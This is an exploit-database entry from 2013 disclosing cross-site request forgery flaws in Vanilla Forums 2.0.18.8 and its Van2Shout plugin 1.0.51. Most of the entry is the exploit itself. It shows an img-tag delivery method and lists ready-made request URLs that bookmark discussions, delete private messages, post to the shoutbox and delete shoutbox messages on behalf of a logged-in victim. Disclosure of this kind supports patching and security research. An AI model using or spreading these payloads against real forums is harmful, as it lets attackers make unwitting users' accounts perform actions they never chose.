Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities
# Published : 2013-04-15
# Author :
# Previous Title : Oracle WebCenter Sites Satellite Server - HTTP Header Injection
# Next Title : CMSLogik 1.2.1 - Multiple Vulnerabilities

# Exploit Title:
Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF

# Google Dork: n/a
# Date: 13/4/13
# Exploit Author: Henry Hoggard
# Vendor Homepage: [http://vanillaforums.org/ ,
http://vanillaforums.org/addon/van2shout-plugin]
# Software Link: [http://vanillaforums.org/download,
http://vanillaforums.org/get/van2shout-plugin-1.051]
# Version: [2.0.18.8 , 1.0.51]
# Tested on: [Debian]
# CVE :

=======================

You can exploit these by having the user visit a thread with the img src
of the below urls.

eg <img
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
1337 is the id.

 

Bookmark CSRF:

http://site.org/index.php=/vanilla/discussion/bookmark/1337

UnBookmark CSRF

http://site.org/index.php=/vanilla/discussion/bookmark/1337?

Delete Message CSRF

http://site.org/index.php=/messages/clear/1337

Post to Van2Shout Chat Box CSRF

http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage

Delete Message from Van2Shout Chatbox CSRF

http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337